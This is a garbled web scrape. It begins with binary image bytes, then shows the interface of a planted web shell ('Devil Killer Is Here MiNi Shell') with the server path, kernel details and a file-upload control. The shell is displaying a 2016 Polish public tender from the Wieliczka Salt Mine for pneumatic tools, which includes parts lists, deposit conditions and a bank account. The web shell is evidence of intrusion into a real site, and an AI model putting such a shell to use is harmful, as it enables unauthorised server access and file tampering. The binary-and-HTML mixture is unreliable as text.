JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160510/115926-N-2016.html

<p class="kh_header"><b>Wieliczka: Dostawę narzędzi pneumatycznych oraz części zamiennych</b><br>
<b>Numer ogłoszenia: 115926 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 2787111, 12 2787132, faks 12 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Górnictwo Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę narzędzi pneumatycznych oraz części zamiennych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest sprzedaż wraz z dostarczeniem pneumatycznych pił, młotów, wiertarek, podpór oraz części, zwanych dalej łącznie narzędziami pneumatycznymi, których rodzaj oraz maksymalną ilość określa poniższe zestawienie:
Część A - Narzędzia pneumatyczne
1.	Piła pneumatyczna łańcuchowa spełniająca normy PN-EN1127-2+A1:2010 i PN-EN 13463-1:2010 lub równoważne 1 ilość  6 sztuk.
- maksymalna masa - 5 kg
- maksymalne zużycie powietrza - 1,2 m3/min
- ciśnienie robocze - od 0,4-0,6 MPa
- minimalna moc silnika - 0,8 kW
- długość listwy łańcucha - 350 mm
- maksymalne obroty biegu jałowego - 12 000 obr/min
2.Młot pneumatyczny zbijak spełniający normy PN-EN 1127-2+A1:2010 i PN-EN 13463-1:2010 lub równoważne 2- ilość  10 sztuk
- maksymalna masa wyrobu - 8,8 kg
- maksymalne zużycie powietrza - 1m3/min
- częstotliwość - od 26 do 28 Hz
- ciśnienie robocze - 0,4 - 0,6 MPa
- maksymalny poziom hałasu - 105 dB
- maksymalne wymiary gabarytowe: długość 470 mm, wysokość 210 mm
- gwint przyłączeniowy - G 3/4 lub RD 32
- uchwyt grota roboczego średnica 25 x 75
- wymagana pozycja pracy młota zarówno w poziomie i pionie
3.Wiertnicza podpora pneumatyczna spełniająca normy PN-EN 1127-2+A1:2010 i PN-EN 13463- 1:2010 lub równoważne 3 -  ilość 6  sztuk
- maksymalna masa wyrobu - 19 kg
- maksymalna długość wysuwu - 800 mm
- maksymalna siła docisku - 1000 N
- ciśnienie robocze - 0,4 - 0,6 MPa
- maksymalne wymiary gabarytowe: długość 1480 mm, szerokość 270 mm
4.Wiertarka pneumatyczna ręczna spełniająca normy PN-EN 13463-1:2010 i PN-EN-13463-5:2012 lub równoważne 4 - ilość 4 sztuk
- maksymalna masa wyrobu - 19 kg
- moc - 1,4 - 1,6 kW
- ciśnienie robocze - 0,4 - 0,5 MPa
- maksymalne zużycie powietrza - 2,7 m3/min
- maksymalna średnica narzędzia - 63 mm
5.	Części zamienne do ww. urządzeń - 
a)	łańcuch do piły pneumatycznej - 60 sztuk
b)	prowadnica do piły pneumatycznej - 40 sztuk
c)	grot (szpicak)do młota pneumatycznego zbijaka - 300 sztuk
d)	końcówka stożkowa z nakrętką dociskową do łączenia urządzeń pneumatycznych z instalacją powietrzną , wielkość 20 - 400 kompletów
1 - Jeżeli Wykonawca oferuje dostawę piły pneumatycznej łańcuchowej, powołując się na rozwiązania równoważne zawartym w normie PN-EN1127-2+A1:2010 i PN-EN 13463-1:2010, zamiast tej normy obowiązany jest wskazać w ofercie te rozwiązania oraz załączyć dokumenty wykazujące równoważność oferowanych rozwiązań.
2 - Jeżeli Wykonawca oferuje dostawę młota pneumatycznego zbijaka, powołując się na rozwiązania równoważne zawartym w normie PN-EN 1127-2+A1:2010 i PN-EN 13463-1:2010, zamiast tej normy obowiązany jest wskazać w ofercie te rozwiązania oraz załączyć dokumenty wykazujące równoważność oferowanych rozwiązań.
3 - Jeżeli Wykonawca oferuje dostawę wiertniczej podpory pneumatycznej, powołując się na rozwiązania równoważne zawartym w normie PN-EN 1127-2+A1:2010 i PN-EN 13463- 1:2010, zamiast tej normy obowiązany jest wskazać w ofercie te rozwiązania oraz załączyć dokumenty wykazujące równoważność oferowanych rozwiązań.
4. - Jeżeli Wykonawca oferuje dostawę wiertarki pneumatycznej ręcznej, powołując się na rozwiązania równoważne zawartym w normie PN-EN 13463-1:2010 i PN-EN-13463-5:2012, zamiast tej normy obowiązany jest wskazać w ofercie te rozwiązania oraz załączyć dokumenty wykazujące równoważność oferowanych rozwiązań

Część B - Części zamienne dla narzędzi pneumatycznych. 
1. MŁOTEK PNEUMATYCZNY TYP -  SK 9-5
Lp.; Nazwa; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
1; Cylinder kpl. 0 25x75; 1; 8323590; 5
2; Tuleja 0 25x75; 2; 2005280; 10
3; Bijak; 3; 5003472; 10
4; Pierścień; 4; 3908060; 20
5; Pokrywka; 5; 1511280; 5
6; Sprężyna talerzowa; 6; 315111; 20
7; Kołek; 7; 3051011; 20
8; Uszczelnienie; 8; 273123; 20
9; Tłumik; 9; 273406; 5
10; Pierścień zabezp.; 10; 4771050; 20
11; Pierścień gumowy; 13; 273129; 20
12; Rękojeść; 24; 5259483; 5
13; Dźwignia; 25; 1411172; 40
14; Kołek spr. 8x28; 26; 311038; 10
15; Kulka 11/16 (18); 27; 722094; 10
16; Sprężyna 1; 28; 315007; 30
17; Korek 1; 29; 311376; 20
18; Sworzeń zaworu; 32; 3081271; 20

2. PNEUMATYCZNA PIŁA ŁAŃCUCHOWA TYP - PPR 35-11x
Lp.; Nazwa części; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
1; Wirnik; 4; 420 201 201 043; 2
2; Cylinder; 5; 414 920 200 031; 3
3; Obudowa łożyska; 10; 414 920 203 037; 5
4; Łopatka; 11; 414 920 204 015; 30
5; Tarcza przednia; 12; 414 920 202 036; 3
6; Obudowa łożyska; 13; 414 920 616 004; 5
7; Dźwignia kompletna; 20; 414 920 014 020; 5
8; Rękojeść boczna kompletna; 23; 414 920 011 041; 3
9; Sprężyna zaworu; 27; 315 111 605 014; 5
10; Rurka kompletna; 29; 414 920 084 002; 5
11; Koło łańcuchowe; 48; 414 920 304 031; 10
12; Pierścień zabezpieczający 10; 60; 311 733 000 100; 20
13; Łożysko; 71; 324 162 040 089; 10
14; Iglica II 2x11,8; 72; 324 931 021 253; 10
15; Łożysko; 73; 324 165 010 000; 10
16; Wpust 4x4x8; 74; 311 726 204 008; 30
17; Pierścień 24x20; 75; 273 111 010 130; 20
18; Iglica II 2x7,8; 79; 324 931 020 853; 10
19; Pierścień zabezpieczający 15; 80; 311 733 100 150; 10
20; Pierścień; 127; 414 920 600 117; 10
21; Łożysko; 134; 324 232 001 002; 10
22; Smarownica kompletna; 150; 414 920 087 007; 10
23; Pierścień zabezpieczający 12; 160; 311 733 000 120; 10
24; Końcówka; 180; 414 920 408 077; 10


3. PIŁA PNEUMATYCZNA TYP - PPR 35N    
Lp.; Nazwa części; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
1; JARZMIE; 38; KX 1542 0038 D; 5
2; NAKRĘTKA ROZPIERAJĄCA; 51; KX 1542 0051 E; 10
3; WAŁEK JARZMIA; 54; KX 1542 0054 E; 5
4; KOŁO ZĘBATE 1 (6 ZĘBÓW); 56; RYSUNEK: DEPRAG; 20
5; RING; 66; KX 1542 0066 E; 10
6; ŁOŻYSKO 3201; 68; ĆSN 02 4665; 10
7; RESOR  4e7x4x14; 69; ĆSN 02 2562; 5
8; RESOR 3e7x3x8; 70; ĆSN 02 2562; 30
9; OSŁONA ŁAŃCUCHA; 71; 507 014/42 D RYSUNEK: DEPRAG; 2
10; CZOP NAPINANIA; 74; KX 1542 0074 E; 20
11; RING ZABEZPIECZAJĄCY; 77; ĆSN 02 2930.05; 20
12; ŚRUBA M5x12; 84; 7151; 12
13; ZAWLECZKA 1,6x12; 95; ĆSN 02 1781.05; 10
14; OPINKA NA WĘŻA; 100; KX 1542 0100; 10
15; KĄTOWE POŁĄCZ. GWINTOWE OBROTOWE; 101; Num. Z.: BU 1514 G186 POLIĆ. STROJ.; 20

UKŁAD NAPĘDOWY do piły pneumatycznej TYP - PPR 35N    
Lp.; Nazwa części; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
1; OPRAWA ŁOŻYSKA; 35; KX 1542 1035 E; 5
2; RING; 36; KX 1542 1036 E; 10
3; STATOR; 38; 200-084/38 D RYSUNEK: DEPRAG; 3
4; ROTOR 1 - DLA KOŁA ZĘBATEGO O 6 ZĘBACH; 39; KX 1542 1039 D; 3
5; LAMELA; 40; 204-050/303 E RYSUNEK: DEPRAG; 30
6; RING ROZPIERAJĄCY; 41; KX 1542 1041 E; 5
7; WIEKO PRAWE; 43; KX 1542 1043 D; 5
8; SPRĘŻYNA TARCZOWA; 44; 5-604-028 E RYSUNEK: DEPRAG; 5
9; SPRĘŻYNA; 46; 4-605-018 E RYSUNEK: DEPRAG; 10
10; SPRĘŻYNA; 47; 4-605-014 E RYSUNEK: DEPRAG; 10
11; SITKO - PODZESTAW; 49; 5-405-013 E RYSUNEK: DEPRAG; 10
12; SITKO - PODZESTAW; 53; 405-015/63 E RYSUNEK: DEPRAG; 10
13; RING ZABEZPIECZAJĄCY 24; 58; ĆSN 02 2931; 10
14; RING ZABEZPIECZAJĄCY 12; 59; ĆSN 02 2930; 10
15; O-RING 52x2; 60; HENNLICH; 10
16; O-RING 42x2; 61; HENNLICH; 10
17; RING 24x20; 63; ĆSN 02 9280.2; 10
18; RING 26x2; 64; ĆSN 02 9281.2; 10
19; RING 14x2; 65; ĆSN 02 9281.2; 10
20; ŁOŻYSKO 6001 2RS; 67; ĆSN 02 4640; 20
21; DŹWIGNIA KOMPLET; 78; 4-014-020 E RYSUNEK: DEPRAG; 10
22; NAKRĘTKA SAMOZABEZPIECZAJĄCA M3; 85; ĆSN 02 1492.55; 10


SMAROWANIE do piły pneumatycznej TYP - PPR 35N
Lp.; Nazwa; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
1; POJEMNIK; 3; KX 1542 2003 D; 2
2; IGŁA; 14; KX 1542 2014 E; 2
3; RING USZCZELNIAJĄCY 14x2; 22; ĆSN 02 9310.4; 5
4; WĄŻ POLYURETANOWY 6/4; 28; Num. zam.: zepu 00 06-x polić. strój. 5

4. Wiertarka Pneumatyczna PWRII - Nr rys. PWRII-2208B.
Lp.; Nazwa części; Pozycja z rysunku; Numer rysunku; Ilość sztuk
1; 2; 3; 4; 5
2; Łożysko kulkowe 6204; 5; ; 50
3; Pierścień uszcz. A30x40x7; 7; ; 10
4; Zespół wirnika; 10; PWR II-2208-1 OT; 5
5; Wałek zębaty; 13; D14-17A9/b; 5
6; Śruba M8x25; 15; ; 20
7; Śruba M8x30; 16; ; 20
8; Sitko; 17; PWR II-2208-17; 10
9; Sprężyna F3nr rys. PWRII-2208B.; 19; PWRII-2208B.; 20
10; Śruba M8x20; 21; PWRII-2208B.; 20
11; Lekka wkładka SR1560; 22; MOSS; 10
12; Rurka 016/010,2x110; 23; D14-22-80-9 (ER); 10
13; Śruba z łbem grzybkowym M8x130; 24; ; 10
14; Rękojeść gumowa; 25; D14-12.74 (ER); 10
15; Uchwyt górny; 26; PWR II-2208-26; 2
16; Nakrętka kołpakowa M10; 28; 20
17; Wkręt M6x12; 29; 10
18; Pierścień osadczy spr. Z20; 30; PWRII-2208B.; 10
19; Łopatki; - 100

Zespól głowicy do wiertarki pneumatycznej PWRII  - Nr rys. PWRII-2208-2B.; 
Lp.; Nazwa części; Pozycja z rysunku; Numer rysunku; Ilość sztuk
1; Wieniec zębaty; 2; G14-2B7/b; 2
2; Pierścień osadczy spr. W62; 3; ; 5
3; Zespół napędowy; 4; PWRll-2208-2-4; 2
4; Łożysko kulkowe 6206; 5; ; 10
5; Chwyt wiertła; 8; G14-2B4/e; 2
6; Pierścień uszcz. A40x52x7; 9; ; 5
7; Wpust 6x4,4x25; 10; PWRll-2208-2; 2


Zespół napędowy do wiertarki pneumatycznej PWRII -  Nr rys. 2208-2-4; 
Lp.; Nazwa części; Pozycja z rysunku; Numer rysunku; Ilość sztuk
1; Jarzmo; 1; PWRII-2208-2-4-1; 1
2; Pierścień dociskowy; 2; PWRII-2208-2-4-2; 1
3; Koto zębate obiegowe; 3; Dl 4-17BA-1 Ib; 2
4; Śruba specjalna M8x30; 4; PWRII-2208-2-4-8; 2
5; Trzpień prowadzący PWRII; 5; PWRII-2208-2-4-9; 2
6; Podkładka spr. 8,2; 6; ; 2
7; Igiełka O 03,5x19,8; 7; ; 30


Uchwyt dolny sterowany do wiertarki pneumatycznej PWRII- Nr rys. PWRII-2208-18B.
Lp.; Nazwa części; Pozycja z rysunku; Numer rysunku; Ilość sztuk
1; Uchwyt dolny sterowany; 1; PWRII-2208-18 B; 2
2; Popychacz; 2; PWRII-2208-10; 5
3; Tulejka prowadząca; 3; PWRII-2208-9; 5
4; Kołek fi4; 4; PWRiII-2208-18-16; 5
5; Tuleja gwintowana; 5; PWRII-2208-18 B-5; 5
6; Podkładka miedziana 030,5/038x3; 7; PWRII-2208-18 B-7; 10
7; Dźwignia; 8; D14-15-10; 5
8; Kotek rozprężny; 9; ; 10
9; Osłona gumowa; 10; D14-15-5; 10
10; Nakrętka M6; 11; ; 10
11; Wkręt M6x16; 12; ; 10
12; Lekka wkładka SR1560; 13; MOSS; 10
13; Pierścień uszcz. typ ON 9x1,5; 14; INCO; 10
14; Kołek fi 2; 15; PWRII-2208-18-17; 10

5. WIERTNICZA PODPORA PNEUMATYCZNA VP 800-1
Lp.; Nazwa części; Pozycja z rysunku; Symbol katalogowy; Ilość sztuk
VP800-1; 
1; Dźwignia; 4; 1415-071; 10
2; Suwak; 6; 4013-100; 10
3; Sprężyna suwaka; 7; 315 005; 10
4; Podkładka suwaka; 8; 0913-180; 10
5; Podkładka noskowa; 10; 0955-040; 10
6; Kołek 5x20; 11; 311 221; 10
7; Kołek 5x25; 13; 311 223; 10
8; Pierścień cierny 40; 19; 273 305; 10
9; Pierścień O 50x40; 20; 273 049 ; 10
10; Manżeta U 40x56; 21; 722 013; 10
11; Pierścień O 55x2; 22; 273 109; 10
12; Pierścień; 23; 3904-020; 10
13; Manżeta 58x18x18x4; 25; 722 012; 20
14; Zawór redukcyjny kpl.; 31; 9423-000; 10
15; Przyłączka; 32; 4082-290; 10

2. Zamawiający zobowiązuje się do zakupu narzędzi pneumatycznych, o wartości 60% ceny całkowitej brutto. Pozostałą cześć narzędzi pneumatycznych o wartości 40% ceny całkowitej brutto, Zamawiający zakupi w zależności od potrzeb (prawo opcji).
3. Wykonawca zobowiązuje się do sprzedaży i dostarczenia do Zamawiającego narzędzi pneumatycznych, na zasadach określonych w umowie, będącej załącznikiem nr 7 do SIWZ.

Szczegółowe informacje dotyczące przedmiotu zamówienia i jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 7 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego www.kopalniawieliczka.eu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.65.10.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wadium w wysokości: 5 000,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 SIWZ.
2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 z dopiskiem: wadium w sprawie KSW/2016/EL/12
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV SIWZ.
4.Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.Zgodnie z art. 46 ust 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
1)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
2)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się 
na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie wykonania w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednej dostawy narzędzi pneumatycznych o wartości nie mniejszej niż 150 000,00 zł (brutto), wraz z podaniem jej wartości, przedmiotu, daty wykonania 
i podmiotu, na rzecz którego dostawa została wykonana, oraz załączeniem dowodów, czy została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

